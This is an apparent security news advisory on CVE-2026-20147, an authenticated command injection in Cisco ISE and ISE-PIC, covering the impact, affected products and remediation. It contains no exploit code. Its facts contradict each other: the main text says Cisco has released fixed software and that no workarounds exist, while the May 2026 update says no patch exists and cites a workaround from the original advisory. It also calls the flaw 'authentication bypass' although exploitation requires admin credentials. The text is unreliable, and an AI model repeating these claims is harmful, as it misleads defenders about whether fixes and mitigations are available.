Cisco ISE authenticated command execution (CVE-2026-20147)

Patch now - CVE-2026-20147 is a critical OS command injection in Cisco ISE and ISE-PIC that lets an authenticated admin escalate to root and cause denial-of-service. Update affected appliances immediately per the Cisco advisory.

Overview

A critical vulnerability in Cisco Identity Services Engine (ISE) and ISE Policy Integration Client (ISE-PIC) allows authenticated administrators to execute arbitrary commands on the device’s underlying operating system. Tracked as CVE-2026-20147 with a maximum CVSS score of 9.9, this flaw stems from insufficient input validation in the web interface.

Vulnerability Details

The vulnerability exists because the affected software does not properly validate user-supplied input in specific HTTP requests. An attacker with valid administrative credentials can send a crafted HTTP request to exploit this weakness.

A successful exploit grants the attacker initial access at the user level on the host operating system. The attacker can then leverage this foothold to escalate privileges to the root level, gaining complete control over the appliance. In single-node ISE deployments, exploitation can also cause the node to become unavailable, creating a denial-of-service (DoS) condition. This would prevent new endpoints from authenticating to the network until service is restored.

Affected Products

This vulnerability affects the following Cisco products:

• Cisco Identity Services Engine (ISE)
• Cisco Identity Services Engine Policy Integration Client (ISE-PIC)

Administrators should consult the official Cisco Security Advisory for a detailed list of affected software versions. Cisco has released software updates that address this vulnerability.

Remediation and Mitigation

The primary and most effective action is to apply the relevant patch provided by Cisco. There are no workarounds that address this vulnerability.

Immediate Action Required:

1. Patch: Upgrade affected devices to a fixed software version as listed in the security advisory. This is the only complete remediation.
2. Principle of Least Privilege: Strictly enforce the principle of least privilege for administrative accounts. Since exploitation requires admin credentials, limiting the number of users with this level of access reduces the attack surface.
3. Network Controls: As a general best practice, restrict management interface access to trusted source IP addresses using network access control lists (ACLs).

While this vulnerability is not currently listed on CISA’s Known Exploited Vulnerabilities (KEV) catalog, its critical severity and potential impact warrant urgent patching.

Security Insight

This vulnerability highlights the persistent risk of improper input validation in network management interfaces, even for credentialed users. It echoes the pattern seen in incidents like the Interlock ransomware group’s exploitation of a Cisco FMC zero-day, where administrative access was leveraged for deeper system compromise. For critical infrastructure components like network access control systems, a “trust but verify” approach to all user input, regardless of privilege level, remains essential.

Update - May 2026

Since original publication on April 15, Cisco has not released a security patch for CVE-2026-20147 as of May 10. The advisory remains unchanged, with no updated workarounds or fixed software versions posted. The vulnerability is not yet added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, though monitoring is advised given the CVSS 9.9 critical rating.

Exploitation probability as measured by EPSS has slightly decreased from 0.00284 (52nd percentile) to 0.0028 (still 52nd percentile), indicating no surge in scanning or exploit attempts observed across telemetry sources. No proof-of-concept code or active exploitation reports have been confirmed publicly.

In the same authentication bypass and command injection attack pattern, two related CVEs were disclosed in late April: CVE-2026-20152 (Cisco ISE privilege escalation) and CVE-2026-20164 (Cisco ISE-PIC information disclosure). Defenders should treat these as reinforcing the same threat surface.

Recommended actions: Continue monitoring the Cisco PSIRT page for patches. Apply the current workaround from the original advisory (restricting RADIUS/TACACS+ session privileges) if not already enforced. Block inbound management access to affected ISE nodes from untrusted networks. Revisit authentication logs for unusual command execution patterns (e.g., unexpected shell commands from admin accounts). Await a patch release before considering this vulnerability resolved.

Further Reading

• Interlock Ransomware Exploits Cisco FMC Zero-Day
• CISA Warns of Zimbra, SharePoint Exploits; Cisco
• DarkSword iOS Exploit Kit Uses 6 Flaws, 3 Zero-Days for
• All Critical Vulnerabilities
• Recent Critical Vulnerabilities
• Top Critical CVEs